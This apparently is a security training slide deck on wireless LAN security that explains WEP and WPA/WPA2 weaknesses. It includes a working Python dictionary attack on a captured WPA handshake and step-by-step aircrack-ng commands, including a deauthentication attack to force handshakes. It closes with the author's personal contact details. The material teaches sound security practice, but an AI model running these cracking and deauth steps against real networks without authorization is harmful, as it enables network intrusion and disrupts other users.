
Wireless Security

About me: Nilesh Sapariya
CEH v8, CCNA
Security Engineer
Agenda
1) Introduction to WLAN Security

2) WLAN Architectures

3) WPA / WPA2 PSK (Personal) Cracking


WLAN
1) In computing, a Wireless LAN (Wireless Local Area Network) is a Local Area Network that does not need cables to connect its devices.
2) Instead, radio waves are used to communicate.


From Fixed Devices to Mobile Devices
Mobile devices have no LAN port; Wi-Fi is their only (and best) mode of connectivity.
With Wi-Fi, wired edge ports can be cut roughly in half.
[Figure: representative 12-person workgroup. Existing wired network edge, 1:1 ratio of ports to devices: 12 VoIP phones (V), 7 desktop PCs (D), 5 laptop PCs (L), 6 conference-room and public-area ports (C), 5 other devices such as printer, copier and fax (O), 12 ports reserved for future use (F), 1 wireless AP for mobile devices and guests (AP). Right-sized edge: one port supports multiple users and devices simultaneously through the AP, so the laptop, conference-room and reserved ports disappear.]
Wireless is a more efficient, many-to-one access method.


Security Risk

Uncontrolled wireless devices
Rogue APs
Laptops acting as bridges
Misconfigured WLAN settings on laptops
Ad-hoc networks

Attacks against WLAN infrastructure
Denial of service / flooding
Man-in-the-middle
WEP (Wired Equivalent Privacy) cracking (aircrack-ng is the well-known tool)
WPA/WPA2 (Wi-Fi Protected Access) cracking (again aircrack-ng)
Security Risk
[Figure: office network with a server, showing a rogue user, a misconfigured access point, an ad-hoc network and access point MAC spoofing.]
And more attacks of this kind.


Wireless Standards - 802.11a, 802.11b/g/n, and 802.11ac

In 1997 the IEEE (Institute of Electrical and Electronics Engineers) created the first WLAN standard, called 802.11.
The original 802.11 only supports a maximum network bandwidth of 2 Mbps (too slow for most applications).
WLAN Operation
A Wireless LAN (WLAN) can operate in 2 different frequency ranges:
2.4 GHz (802.11 b/g/n)
4.9 or 5 GHz (802.11 a/h/j/n)
Note: your wireless card can only be on one channel at a time (it has a single radio).
Every country defines its own allowed channels, permitted users and maximum power levels.
Fair distribution of clients across channels, e.g. the non-overlapping 2.4 GHz channels 1, 6 and 11.
Fair distribution of clients across bands, e.g. 2.4 GHz and 5 GHz.
WLAN Setup
Fat access point: each AP itself handles management, policy, mobility, forwarding, encryption and authentication, on top of its 802.11a/b/g/n radio and antennas.
Result: many devices to manage, many entry points to secure.

Centralized: a mobility controller handles management, policy, mobility, forwarding, encryption and authentication; the thin access points keep only the 802.11a/b/g/n radio and antennas.
Result: centralized management, centralized security.
Wardriving
How to find the SSIDs in your area
How to find a hidden SSID
Tools used:
i. inSSIDer
ii. CommView for WiFi
Understanding WPA / WPA2
(Wi-Fi Protected Access)
Wireless Encryption

The main source of vulnerability in wireless networks is the encryption method. There are a few different types of wireless encryption, including:

WEP
WPA
WPA2
WEP
Stands for Wired Equivalent Privacy.
WEP is recognizable by its key of 10 or 26 hexadecimal digits (a 40-bit or 104-bit key).
WPA or WPA2
Stands for Wi-Fi Protected Access.
Created to provide stronger security.
Still crackable if a short or guessable passphrase is used.
If a long, random passphrase is used, these protocols are practically uncrackable by a dictionary attack.
WPA-PSK, with either TKIP or AES (CCMP), uses a Pre-Shared Key (PSK) derived from a passphrase of 8 to 63 characters (the 256-bit key can also be entered directly as 64 hex digits).
Why WPA?

WEP (Wired Equivalent Privacy) is broken beyond repair: whether you use a 64-bit or a 128-bit key, WEP will be broken.
Weaknesses of WEP
1. Poor key management

WEP uses the same key for authentication and encryption.
It provides no mechanism for session key refreshing.
Static key encryption is used.

2. One-way authentication (the client authenticates to the AP, the AP never authenticates to the client).
WEP Replacement

                  WPA                                           WPA2
Role              Intermediate solution by the Wi-Fi Alliance   Long-term solution
Protocol          TKIP (Temporal Key Integrity Protocol)        CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol)
Cipher            Based on WEP (RC4)                            Based on AES
Hardware          Hardware change not required, firmware update  Hardware change required
Personal mode     PSK                                           PSK
Enterprise mode   802.1X + RADIUS                               802.1X + RADIUS


Difference between WPA-Personal & WPA-Enterprise

Wireless Architecture
How to create a profile for WPA-Personal and WPA-Enterprise
WEP: Static Key Encryption
Probe Request / Response
Authentication Request/Response, Association Request/Response
Both client and AP hold the same static WEP key.
Data is encrypted directly with that static key.

WPA: Non-Static Key
Probe Request / Response
Authentication, Association
Both client and AP hold the same Pre-Shared Key.
A dynamic (per-session) key is generated first.
Data is encrypted with the dynamic key, never with the Pre-Shared Key itself.

How are the dynamic keys created?


WPA / WPA2 PSK (Personal) Cracking
WPA Pre-Shared Key

Both the AP and the client derive the same 256-bit Pre-Shared Key from the passphrase (8-63 characters) with PBKDF2.

PBKDF2
Password-Based Key Derivation Function 2
RFC 2898
PSK = PBKDF2(Passphrase, SSID, ssidLen, 4096, 256)
4096 - number of times the passphrase is hashed (HMAC-SHA1 iterations)
256 - intended key length of the PSK, in bits
How does the client know the SSID, which acts as the salt?
From beacon frames, or from probe response packets from the AP.
The same fact can be used to build a WPA/WPA2 honeypot as well: an AP that advertises the target SSID gets clients to start a handshake with it.
How WEP Cracking Works
1) We collect a large number of data packets.
2) Among them, many packets carry weak IVs (initialization vectors) that leak key bytes.
3) We run them through the statistical attack in aircrack-ng and get the key.

Then how to crack WPA-PSK?

Let's shake hands: the 4-way handshake
Supplicant (client)                         Authenticator (AP)
Probe Request / Response
Authentication Request/Response, Association Request/Response
Both sides already hold the 256-bit Pre-Shared Key.

Message 1: AP -> client: ANonce (the client can now compute the PTK)
Message 2: client -> AP: SNonce + MIC (the AP can now compute the PTK and verify the MIC)
Message 3: AP -> client: key install + MIC, key installed on the client
Message 4: client -> AP: key install acknowledgement, key installed on the AP

Pairwise Transient Key
PTK = Function(PMK, ANonce, SNonce, Authenticator MAC, Supplicant MAC)

PMK = Pairwise Master Key; in WPA-Personal this is the Pre-Shared Key.

ANonce = random value chosen by the AP
SNonce = random value chosen by the client
Authenticator MAC = AP MAC
Supplicant MAC = client MAC
MIC = Message Integrity Check, a keyed signature over the handshake message computed with the PTK
WPA Working: Block Diagram
4-way handshake

Passphrase (8-63) + SSID  --PBKDF2-->  Pre-Shared Key (256 bit)
Pre-Shared Key + SNonce + ANonce + AP MAC + Client MAC  --PRF-->  PTK

WPA-PSK is susceptible to a dictionary attack: the SSID, both MAC addresses, both nonces and the MIC are all visible in a captured handshake, so the only unknown is the passphrase, and each guess can be checked offline.
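As an added example (not code from the original slides), the whole chain from the PBKDF2 slide, the 4-way handshake slide and the block diagram above, ending in the offline dictionary attack that aircrack-ng performs in its final step. The SSID, MAC addresses, nonces, passphrase, wordlist and the EAPOL-Key message 2 are constructed for the demo; the handshake MIC is produced by the same code under the true passphrase, so the attack can be checked end to end without a real capture. The PSK function is checked against the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE").

```python
import hashlib
import hmac
import struct

EAPOL_MIC_OFFSET = 81  # 4-byte EAPOL header + 77 bytes of key-descriptor fields before Key MIC


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PSK (= PMK in WPA-Personal): PBKDF2-HMAC-SHA1, salt = SSID, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs || min/max of the nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)


def eapol_mic(kck: bytes, eapol_frame: bytes, key_info_version: int) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    Version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) uses HMAC-SHA1 truncated to 128 bits."""
    zeroed = eapol_frame[:EAPOL_MIC_OFFSET] + b"\x00" * 16 + eapol_frame[EAPOL_MIC_OFFSET + 16:]
    if key_info_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, key_info: int, replay_counter: int, key_data: bytes) -> bytes:
    """Constructed handshake message 2 (client -> AP) with the MIC field still zeroed."""
    body = struct.pack(">BHHQ", 2, key_info, 16, replay_counter)      # RSN descriptor, key info, key len, replay ctr
    body += snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8         # key nonce, key IV, key RSC, key ID
    body += b"\x00" * 16 + struct.pack(">H", len(key_data)) + key_data  # MIC placeholder, key data
    return struct.pack(">BBH", 2, 3, len(body)) + body                # EAPOL v2, type 3 = EAPOL-Key


def crack_psk(ssid, ap_mac, client_mac, anonce, snonce, eapol_msg2, captured_mic, wordlist):
    """The dictionary attack: re-derive KCK for every candidate and compare the message-2 MIC."""
    key_info = struct.unpack(">H", eapol_msg2[5:7])[0]
    version = key_info & 0x0007                      # key descriptor version selects the MIC algorithm
    for candidate in wordlist:
        pmk = wpa_psk(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, client_mac, anonce, snonce)[:16]   # KCK = first 128 bits of PTK
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, version), captured_mic):
            return candidate
    return None


# --- constructed sample handshake (assumed values, not a real capture) ---
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("00146c7e4030")
CLIENT_MAC = bytes.fromhex("001d60a1b2c3")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "sunflower123"
MSG2 = build_eapol_msg2(SNONCE, 0x010a, 1, b"")     # key info 0x010a: version 2, pairwise, MIC present


def constructed_mic() -> bytes:
    """What the client would put in message 2: the MIC under the true passphrase (constructed here)."""
    kck = derive_ptk(wpa_psk(TRUE_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return eapol_mic(kck, MSG2, 2)


def demo():
    wordlist = ["password", "letmein", "sunflower123", "qwerty"]   # stand-in for wpa.txt
    return crack_psk(SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, MSG2, constructed_mic(), wordlist)


if __name__ == "__main__":
    print("PSK for 'password' / 'IEEE':", wpa_psk("password", "IEEE").hex())
    print("recovered passphrase:", demo())
```

Each candidate costs 4096 HMAC-SHA1 rounds for PBKDF2 plus four more for the PRF, which is why the attack is only as good as the wordlist and why a long random passphrase defeats it; note also that nothing here needs the AP, so the attacker works offline after the handshake is captured.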
DEMO

WPA / WPA2 PSK (Personal) Cracking

External wireless card: Alfa Networks AWUS036H
USB-based card
Drivers already integrated with BackTrack and Kali
Allows packet sniffing
Allows packet injection
We will use this in our demo session
Software Setup

Run Kali Linux in a VM
Connect the Alfa adapter (pass the USB device through to the VM)
Understanding Wireless Sniffing
Wireless: monitor mode
When you put the card in monitor mode it accepts every frame it sees on the current channel, not only the frames addressed to it.
Kali ships a tool that quickly puts the card into monitor mode so you can sniff packets: airmon-ng (part of the aircrack-ng suite of tools).
Some Basic Terms
MAC address (physical address): a unique identifier assigned to a network interface for communication.

Access point >> wireless router

SSID (service set identifier) >> network name

BSSID (basic service set identifier) >> MAC address of the access point
Using Kali Linux or BackTrack
Some basic BackTrack/Kali terms >>
wlan0: the wireless interface
mon0: the monitor-mode interface created from it
Handshake: the 4-way negotiation between the client and the access point when joining a WPA/WPA2 network. Capturing it is needed to crack WPA/WPA2-PSK.
Dictionary: a list of common passwords.
.cap file: the file used to store captured packets.
Tools Used
airmon-ng >> places wireless cards in monitor mode.
airodump-ng (packet sniffer) >> listens to the wireless routers in the area and writes captures to disk.
aireplay-ng (packet injector) >> injects frames. Its primary function is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys.
aircrack-ng >> cracks WEP keys (statistical attack) and WPA/WPA2-PSK keys (dictionary attack).
Let's Hack
Let's Start
airmon-ng
This lists all of the wireless cards that support monitor mode (support for monitor mode does not guarantee injection).
airmon-ng start wlan0
The "(monitor mode enabled)" message means that the card has successfully been put into monitor mode. Note the name of the new monitor interface; mine is mon0.
airodump-ng mon0
airodump-ng will now list all of the wireless networks in your area with their BSSID, channel and encryption type.
airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/ [monitor interface]
Replace [channel] with the channel of your target network, paste the network's BSSID where [bssid] is, and replace [monitor interface] with the name of your monitor-enabled interface (mon0).
airodump-ng will now monitor only the target network, allowing us to capture more specific information about it, and will write the captured frames to a .cap file under /root/Desktop/.

NOTE:
What we are really doing now is waiting for a device to connect or reconnect to the network, because that is when the client and the router perform the four-way handshake we need to capture in order to crack the password.
aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
-0 is the deauthentication attack and 2 is the number of deauth rounds to send; -a is the router's BSSID and -c the MAC of a client currently associated with it (taken from the station list at the bottom of the airodump-ng screen). The deauthenticated client reconnects and performs a fresh handshake.
Upon hitting Enter, you'll see aireplay-ng send the packets, and within moments you should see "WPA handshake: [bssid]" appear in the top-right of the airodump-ng screen.
Final Step
aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
-a is the method aircrack-ng will use to crack the handshake; 2 = WPA/WPA2-PSK.
-b stands for BSSID; replace [router bssid] with the BSSID of the target router, mine is 00:14:BF:E0:E8:D5.
-w stands for wordlist; replace [path to wordlist] with the path to a wordlist that you have downloaded. I have a wordlist called wpa.txt in the root folder.
/root/Desktop/*.cap is the path to the .cap file containing the captured handshake. The file does not contain the password itself; aircrack-ng derives a key from each wordlist entry and checks it against the handshake.
If the passphrase is in the wordlist, aircrack-ng will show it with "KEY FOUND!". If it is not, the attack fails no matter how long it runs.
Thank you

Email: nilesh.s.sapariya@gmail.com
Twitter : @nilesh_loganx
Contact : 8898813662